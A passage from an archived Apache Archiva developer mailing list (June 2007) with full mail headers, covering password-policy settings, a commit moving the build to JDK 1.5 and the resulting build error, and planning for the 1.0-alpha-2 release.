security.policy.password.rule.numericalcount.minimum=1 Password rule that ensure the password contains a minimum number of numerical (0-9) characters. Currently turned on and requires 1 numerical character to exist in the proposed password. security.policy.password.rule.characterlength.enabled=true security.policy.password.rule.characterlength.minimum=1 security.policy.password.rule.characterlength.maximum=8 Password rule that ensure the password character length is within a specific character length. Currently turned on and requires a password to be between 1 and 8 characters in length. (Can be any combination of alpha or numeric) security.policy.password.rule.musthave.enabled=true Simple password rule that ensure that the password proposal contains some, any content. Currently turned on. (Similar in scope to characterlength rule) security.policy.password.rule.nowhitespace.enabled=true Password rule that ensure that there are no whitespace characters present in the proposed password. Currently turned on. -- - Joakim Erdfelt [email protected] Open Source Software (OSS) Developer From [email protected] Tue Jun 19 01:31:36 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28845 invoked from network); 19 Jun 2007 01:31:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2007 01:31:34 -0000 Received: (qmail 52031 invoked by uid 500); 19 Jun 2007 01:31:38 -0000 Delivered-To: [email protected] Received: (qmail 51981 invoked by uid 500); 19 Jun 2007 01:31:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51972 invoked by uid 99); 19 Jun 2007 01:31:37 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 18 Jun 2007 18:31:37 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx05.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 18 Jun 2007 18:31:33 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAADrOdkY6skoB/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,436,1175436000"; d="scan'208";a="51719788" Received: from 1.042.dsl.brs.iprimus.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by smtp05.syd.iprimus.net.au with ESMTP; 19 Jun 2007 11:31:10 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Use of JDK 5 in Archiva Date: Tue, 19 Jun 2007 11:31:06 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org As in Continuum, I've made this change. I'm going with lazy consensus - so if there are any objections please holler before dependent code arrives :) On 19/06/2007, at 11:26 AM, [email protected] wrote: > Author: brett > Date: Mon Jun 18 18:26:34 2007 > New Revision: 548544 > > URL: http://svn.apache.org/viewvc?view=rev&rev=548544 > Log: > allow use of JDK 5 in Archiva > > Modified: > maven/archiva/trunk/pom.xml > > Modified: maven/archiva/trunk/pom.xml > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/pom.xml? > view=diff&rev=548544&r1=548543&r2=548544 > ====================================================================== > ======== > --- maven/archiva/trunk/pom.xml (original) > +++ maven/archiva/trunk/pom.xml Mon Jun 18 18:26:34 2007 > @@ -95,11 +95,31 @@ > </execution> > </executions> > </plugin> > +<!-- Doesn't work on Mac with Java 6 yet > + <plugin> > + <artifactId>maven-enforcer-plugin</artifactId> > + <executions> > + <execution> > + <id>enforce-java</id> > + <goals> > + <goal>enforce-once</goal> > + </goals> > + <configuration> > + <rules> > + <requireJavaVersion> > + <version>1.5.0</version> > + </requireJavaVersion> > + </rules> > + </configuration> > + </execution> > + </executions> > + </plugin> > +--> > <plugin> > <artifactId>maven-compiler-plugin</artifactId> > <configuration> > - <source>1.4</source> > - <target>1.4</target> > + <source>1.5</source> > + <target>1.5</target> > </configuration> > </plugin> > <plugin> > From [email protected] Tue Jun 19 18:08:45 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48793 invoked from network); 19 Jun 2007 18:08:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2007 18:08:44 -0000 Received: (qmail 86268 invoked by uid 500); 19 Jun 2007 18:08:47 -0000 Delivered-To: [email protected] Received: (qmail 86243 invoked by uid 500); 19 Jun 2007 18:08:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86234 invoked by uid 99); 19 Jun 2007 18:08:46 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Jun 2007 11:08:46 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Jun 2007 11:08:42 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id A3C964809D for <[email protected]>; Tue, 19 Jun 2007 18:08:20 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 6BBD84809C for <[email protected]>; Tue, 19 Jun 2007 18:08:20 +0000 (UTC) Message-ID: <[email protected]> Date: Tue, 19 Jun 2007 14:08:16 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: Re: Planning for 1.0-alpha-2 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org There are a few proxy related bugs left to work out in 1.0-alpha-2, I'd like to get a functional proxying working for the 1.0-alpha-2 release. I think this weekend might be doable. But that depends on the help testing the bug fixes. - Joakim Wendy Smoak wrote: > How does the weekend of June 23rd sound for another Archiva alpha > release? Joakim, are you already planning to do one before then? > > Any thoughts on how many of the 110 issues marked for 1.0-alpha-2 in > jira could actually make it in that two-week time frame? > > Thanks, > Wendy > From [email protected] Tue Jun 19 21:34:08 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26983 invoked from network); 19 Jun 2007 21:34:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2007 21:34:07 -0000 Received: (qmail 41639 invoked by uid 500); 19 Jun 2007 21:34:10 -0000 Delivered-To: [email protected] Received: (qmail 41603 invoked by uid 500); 19 Jun 2007 21:34:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41594 invoked by uid 99); 19 Jun 2007 21:34:10 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Jun 2007 14:34:10 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Jun 2007 14:34:06 -0700 Received: by an-out-0708.google.com with SMTP id d30so539345and for <[email protected]>; Tue, 19 Jun 2007 14:33:45 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth; b=B1f4m4KYR97ZDTz5+6blerAzdJJLcuc5Q41Jq+yljsi61Y0wdR6PZ3C9rOi54vPiqiqlwFdII8Jm3Z45eOVao6nMCrea8xy0Zxxsc7ATf3/Rpon4Hijgl7lWYnF2VUgRm8jvP5/pAQ6jp/lJ5wG9jTekbE1cDLoYAywxJ7Yblwo= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth; b=dpy44W+QhKpsRglKdAMGmUDBqn+ywq+ocpArThoANSl/BEHQirnrgjCy8enMzTAc5vghjnji5jiHJnfUZ7HFejSWcbMh7FmSf3RN/BBBJt9sxXhkxxGWRqZNxsWydZJ+qjzpLotjISBvHPBsomcsrg9dgFBAAVv1q4dVVc2GUj0= Received: by 161.129.204.104 with SMTP id p12mr4808514and.1182288823017; Tue, 19 Jun 2007 14:33:43 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 19 Jun 2007 14:33:42 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 19 Jun 2007 23:33:42 +0200 From: "Fabrice Bellingard" <[email protected]> Sender: [email protected] To: [email protected] Subject: Re: Planning for 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_27578_14933234.1182288822993" References: <[email protected]> <[email protected]> X-Google-Sender-Auth: 73b485aadc85f43d X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_27578_14933234.1182288822993 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi Joakim, which proxy related bugs do you think of? I've tested Archiva proxying for some days, and it works pretty good for me. I mean, if we'd have to release alpha-2, I wouldn't say no. :-) Fabrice. On 6/19/07, Joakim Erdfelt <[email protected]> wrote: > > There are a few proxy related bugs left to work out in 1.0-alpha-2, I'd > like to get a functional proxying working for the 1.0-alpha-2 release. > > I think this weekend might be doable. But that depends on the help > testing the bug fixes. > > - Joakim > > Wendy Smoak wrote: > > How does the weekend of June 23rd sound for another Archiva alpha > > release? Joakim, are you already planning to do one before then? > > > > Any thoughts on how many of the 110 issues marked for 1.0-alpha-2 in > > jira could actually make it in that two-week time frame? > > > > Thanks, > > Wendy > > > > ------=_Part_27578_14933234.1182288822993-- From [email protected] Wed Jun 20 10:42:41 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90203 invoked from network); 20 Jun 2007 10:42:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2007 10:42:40 -0000 Received: (qmail 81178 invoked by uid 500); 20 Jun 2007 10:42:43 -0000 Delivered-To: [email protected] Received: (qmail 81137 invoked by uid 500); 20 Jun 2007 10:42:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81128 invoked by uid 99); 20 Jun 2007 10:42:43 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 03:42:43 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 03:42:38 -0700 Received: by an-out-0708.google.com with SMTP id d30so28571and for <[email protected]>; Wed, 20 Jun 2007 03:42:17 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=EyHlisAzPJOXG4XfKjlkcleQUKnf3i8A1R18zXM6nMANM9UqP6gAtTxREGLKnZXlIM5ng3bFmBJ/OVNPXtkNLK2UJrE1YvqIWR40UXkIENFjheAGqohbwHTEEZ3+oKOsoSmSjsKP6DkXn9lpCwhGxMIMM8bhd5G0+UIY+ceeYiA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=IEHJDigYMwj2ZzynAGzvW4ppNzp2egCftujpQFegYcBg9htuEaJMhUA74jqZRTKcr+61owh0u32QaWhqT5uJ3M6BEsPRDxDpd36ad4JGvlH3M51jaNDfqjtsSWTC119txOV+e5bmrN7hjg86nTaejuImPFDMz9y32W9Usib9jmQ= Received: by 161.129.204.104 with SMTP id k4mr289580ank.1182336137565; Wed, 20 Jun 2007 03:42:17 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 20 Jun 2007 03:42:17 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 20 Jun 2007 12:42:17 +0200 From: "Fabrice Bellingard" <[email protected]> To: [email protected] Subject: Re: Use of JDK 5 in Archiva In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_34101_14505131.1182336137544" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_34101_14505131.1182336137544 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi Brett, I updated my workspace today and tried to build Archiva, and I get an error during JPOX enhancement, in the archiva-model module (UnsupportedClassVersionError, see at the end of the mail for the log). If I use the last revision of the Archiva's root POM (that is, with compiler set to 1.4), then Archiva builds fine. I'm using JDK 1.5.0_01 to run Maven. Any idea? Thanks, Fabrice. ============================================================ INFO [JPOX.Enhancer] - JPOX Enhancer : Input Files JPOX Enhancer : Input Files INFO [JPOX.Enhancer] - >> C:\Archiva\workspace\archiva\archiva-base\archiva-model\target\classes\org\apache\maven\archiva\model\package.jdo >> C:\Archiva\workspace\archiva\archiva-base\archiva-model\target\classes\org\apache\maven\archiva\model\package.jdo INFO [JPOX.Enhancer] - JPOX Enhancer : Using ClassEnhancer "BCEL" JPOX Enhancer : Using ClassEnhancer "BCEL" [ERROR] -------------------- [ERROR] Standard error from the JPox enhancer tool: [ERROR] -------------------- [ERROR] java.lang.UnsupportedClassVersionError: org/apache/maven/archiva/model/ArchivaRepositoryModel (Unsupported major.minor version 49.0) at java.lang.ClassLoader.defineClass0(Native Method) at java.lang.ClassLoader.defineClass(Unknown Source) at java.security.SecureClassLoader.defineClass(Unknown Source) at java.net.URLClassLoader.defineClass(Unknown Source) at java.net.URLClassLoader.access$100(Unknown Source) at java.net.URLClassLoader$1.run(Unknown Source) at java.security.AccessController.doPrivileged(Native Method) at java.net.URLClassLoader.findClass(Unknown Source) at java.lang.ClassLoader.loadClass(Unknown Source) at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source) at java.lang.ClassLoader.loadClass(Unknown Source) at org.jpox.JDOClassLoaderResolver.classOrNull( JDOClassLoaderResolver.java:510) at org.jpox.JDOClassLoaderResolver.classForName( JDOClassLoaderResolver.java:196) at org.jpox.JDOClassLoaderResolver.classForName( JDOClassLoaderResolver.java:362) at org.jpox.metadata.AbstractClassMetaData.loadClass( AbstractClassMetaData.java:524) at org.jpox.metadata.ClassMetaData.populate(ClassMetaData.java:215) at org.jpox.metadata.MetaDataManager.populateFileMetaData( MetaDataManager.java:1060) at org.jpox.enhancer.bcel.metadata.BCELMetaDataManager.populateRegisteredFile( BCELMetaDataManager.java:241) at org.jpox.enhancer.bcel.BCELUtils.getMetaDataForInput(BCELUtils.java :175) at org.jpox.enhancer.JPOXEnhancer.main(JPOXEnhancer.java:512) Exception in thread "main" [ERROR] -------------------- [INFO] ------------------------------------------------------------------------ [ERROR] BUILD ERROR [INFO] ------------------------------------------------------------------------ [INFO] The JPox enhancer tool exited with a non-null exit code. [INFO] ------------------------------------------------------------------------ ============================================================ On 6/19/07, Brett Porter <[email protected]> wrote: > > As in Continuum, I've made this change. I'm going with lazy consensus > - so if there are any objections please holler before dependent code > arrives :) > > On 19/06/2007, at 11:26 AM, [email protected] wrote: > > > Author: brett > > Date: Mon Jun 18 18:26:34 2007 > > New Revision: 548544 > > > > URL: http://svn.apache.org/viewvc?view=rev&rev=548544 > > Log: > > allow use of JDK 5 in Archiva > > > > Modified: > > maven/archiva/trunk/pom.xml > > > > Modified: maven/archiva/trunk/pom.xml > > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/pom.xml? > > view=diff&rev=548544&r1=548543&r2=548544 > > ====================================================================== > > ======== > > --- maven/archiva/trunk/pom.xml (original) > > +++ maven/archiva/trunk/pom.xml Mon Jun 18 18:26:34 2007 > > @@ -95,11 +95,31 @@ > > </execution> > > </executions> > > </plugin> > > +<!-- Doesn't work on Mac with Java 6 yet > > + <plugin> > > + <artifactId>maven-enforcer-plugin</artifactId> > > + <executions> > > + <execution> > > + <id>enforce-java</id> > > + <goals> > > + <goal>enforce-once</goal> > > + </goals> > > + <configuration> > > + <rules> > > + <requireJavaVersion> > > + <version>1.5.0</version> > > + </requireJavaVersion> > > + </rules> > > + </configuration> > > + </execution> > > + </executions> > > + </plugin> > > +--> > > <plugin> > > <artifactId>maven-compiler-plugin</artifactId> > > <configuration> > > - <source>1.4</source> > > - <target>1.4</target> > > + <source>1.5</source> > > + <target>1.5</target> > > </configuration> > > </plugin> > > <plugin> > > > ------=_Part_34101_14505131.1182336137544-- From [email protected] Wed Jun 20 17:37:24 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33913 invoked from network); 20 Jun 2007 17:37:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2007 17:37:23 -0000 Received: (qmail 39423 invoked by uid 500); 20 Jun 2007 17:37:26 -0000 Delivered-To: [email protected] Received: (qmail 39312 invoked by uid 500); 20 Jun 2007 17:37:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 39301 invoked by uid 99); 20 Jun 2007 17:37:26 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 10:37:26 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 10:37:21 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 4D5674809D for <[email protected]>; Wed, 20 Jun 2007 17:37:01 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 137084809C for <[email protected]>; Wed, 20 Jun 2007 17:37:00 +0000 (UTC) Message-ID: <[email protected]> Date: Wed, 20 Jun 2007 13:37:00 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: Re: Planning for 1.0-alpha-2 References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org Fabrice, Excellent news! :-) Check out jira. We recently moved a large chunk of issues out of 1.0-alpha-2 to the nebulous 1.0.x fix version. The remaining list in 1.0-alpha-2 I consider to be important enough to address for 1.0-alpha-2, even if that means, a message on the jira that says "yes, I recognize this as an issue in 1.0-alpha-2, but well postpone it to 1.0-beta-1" ;-) - Joakim Fabrice Bellingard wrote: > Hi Joakim, > > which proxy related bugs do you think of? I've tested Archiva proxying > for > some days, and it works pretty good for me. I mean, if we'd have to > release > alpha-2, I wouldn't say no. :-) > > Fabrice. > > On 6/19/07, Joakim Erdfelt <[email protected]> wrote: >> >> There are a few proxy related bugs left to work out in 1.0-alpha-2, I'd >> like to get a functional proxying working for the 1.0-alpha-2 release. >> >> I think this weekend might be doable. But that depends on the help >> testing the bug fixes. >> >> - Joakim >> >> Wendy Smoak wrote: >> > How does the weekend of June 23rd sound for another Archiva alpha >> > release? Joakim, are you already planning to do one before then? >> > >> > Any thoughts on how many of the 110 issues marked for 1.0-alpha-2 in >> > jira could actually make it in that two-week time frame? >> > >> > Thanks, >> > Wendy >> > >> >> > -- - Joakim Erdfelt Committer and PMC Member, Apache Maven Archiva Developer [email protected] [email protected] Alpaca Founding Member From [email protected] Wed Jun 20 18:05:44 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45631 invoked from network); 20 Jun 2007 18:05:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2007 18:05:43 -0000 Received: (qmail 97150 invoked by uid 500); 20 Jun 2007 18:05:46 -0000 Delivered-To: [email protected] Received: (qmail 97127 invoked by uid 500); 20 Jun 2007 18:05:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97114 invoked by uid 99); 20 Jun 2007 18:05:46 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 11:05:46 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wr-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 11:05:41 -0700 Received: by wr-out-0506.google.com with SMTP id 58so17398wri for <[email protected]>; Wed, 20 Jun 2007 11:05:20 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=Ak13gjhycwEwyo4GYMcrir80d/i8lJI9XoSwao/M9q/Ip9FGG/JF3bu0xtMNa5Q0mDkGKEpXeWWoURpmH7TQClWTLMxB2JNX7dOoS1QDj5rA80RiJIjhC6KvGbeMDn8TvKJc/1Bf2MT6xkwRabR/3D2HqLGoogJ1obQ6PBp1Toc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=s6DQ8w/GKyp5WHeESbamUuLl/Z3ZecNnKTFIpRwceR9Lo0DITllTNAuKKwpUMUixegEW1GjBhzamwptbXYg1HTge8o8xbBa4BYjK3sfVi8rLrIZ/BiZRazFQaRCO+FJG6mCNwTYMDcnsOrJ0txEq06cleS5170jIkuw1ssuOakk= Received: by 161.129.204.104 with SMTP id n16mr820088agb.1182362720526; Wed, 20 Jun 2007 11:05:20 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 20 Jun 2007 11:05:20 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 20 Jun 2007 20:05:20 +0200 From: "Arnaud HERITIER" <[email protected]> To: [email protected] Subject: Re: Planning for 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_68544_22041150.1182362720415" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_68544_22041150.1182362720415 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline I don't agree to postpone m1 support for 1.0.X. It's one of the feature which create the difference with others proxy repo tools... It's the feature which help to install archiva in corporate contexts... Arnaud On 20/06/07, Joakim Erdfelt <[email protected]> wrote: > > Fabrice, > > Excellent news! :-) > > Check out jira. > > We recently moved a large chunk of issues out of 1.0-alpha-2 to the > nebulous 1.0.x fix version. > The remaining list in 1.0-alpha-2 I consider to be important enough to > address for 1.0-alpha-2, even if that means, a message on the jira that > says "yes, I recognize this as an issue in 1.0-alpha-2, but well > postpone it to 1.0-beta-1" ;-) > > - Joakim > > Fabrice Bellingard wrote: > > Hi Joakim, > > > > which proxy related bugs do you think of? I've tested Archiva proxying > > for > > some days, and it works pretty good for me. I mean, if we'd have to > > release > > alpha-2, I wouldn't say no. :-) > > > > Fabrice. > > > > On 6/19/07, Joakim Erdfelt <[email protected]> wrote: > >> > >> There are a few proxy related bugs left to work out in 1.0-alpha-2, I'd > >> like to get a functional proxying working for the 1.0-alpha-2 release. > >> > >> I think this weekend might be doable. But that depends on the help > >> testing the bug fixes. > >> > >> - Joakim > >> > >> Wendy Smoak wrote: > >> > How does the weekend of June 23rd sound for another Archiva alpha > >> > release? Joakim, are you already planning to do one before then? > >> > > >> > Any thoughts on how many of the 110 issues marked for 1.0-alpha-2 in > >> > jira could actually make it in that two-week time frame? > >> > > >> > Thanks, > >> > Wendy > >> > > >> > >> > > > > > -- > - Joakim Erdfelt > Committer and PMC Member, Apache Maven > Archiva Developer > [email protected] > [email protected] > Alpaca Founding Member > > -- .......................................................... Arnaud HERITIER .......................................................... OCTO Technology - [email protected] www.octo.com | blog.octo.com .......................................................... ASF - [email protected] www.apache.org | maven.apache.org ........................................................... ------=_Part_68544_22041150.1182362720415-- From [email protected] Wed Jun 20 18:35:57 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54981 invoked from network); 20 Jun 2007 18:35:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2007 18:35:56 -0000 Received: (qmail 51919 invoked by uid 500); 20 Jun 2007 18:35:58 -0000 Delivered-To: [email protected] Received: (qmail 51808 invoked by uid 500); 20 Jun 2007 18:35:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51799 invoked by uid 99); 20 Jun 2007 18:35:58 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 11:35:58 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 11:35:54 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id AEEA04809E for <[email protected]>; Wed, 20 Jun 2007 18:35:33 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 55B1B4809C for <[email protected]>; Wed, 20 Jun 2007 18:35:33 +0000 (UTC) Message-ID: <[email protected]> Date: Wed, 20 Jun 2007 14:35:32 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: Re: Planning for 1.0-alpha-2 References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org m1 is just postponed to a release after 1.0-alpha-2, and before 1.0-final It's not out, it's not forgotten. :-) The "1.0.x" fix version is just a holding area for 1.0 related jiras. Things that are post-1.0 are in the "Future" fix version right now. When I get back from my various trips these next few weeks I'll be working on the 2 "big" pieces left for archiva 1.0 (Reporting and m1 support) - Joakim Arnaud HERITIER wrote: > I don't agree to postpone m1 support for 1.0.X. It's one of the feature > which create the difference with others proxy repo tools... It's the > feature > which help to install archiva in corporate contexts... > > Arnaud > > On 20/06/07, Joakim Erdfelt <[email protected]> wrote: >> >> Fabrice, >> >> Excellent news! :-) >> >> Check out jira. >> >> We recently moved a large chunk of issues out of 1.0-alpha-2 to the >> nebulous 1.0.x fix version. >> The remaining list in 1.0-alpha-2 I consider to be important enough to >> address for 1.0-alpha-2, even if that means, a message on the jira that >> says "yes, I recognize this as an issue in 1.0-alpha-2, but well >> postpone it to 1.0-beta-1" ;-) >> >> - Joakim >> >> 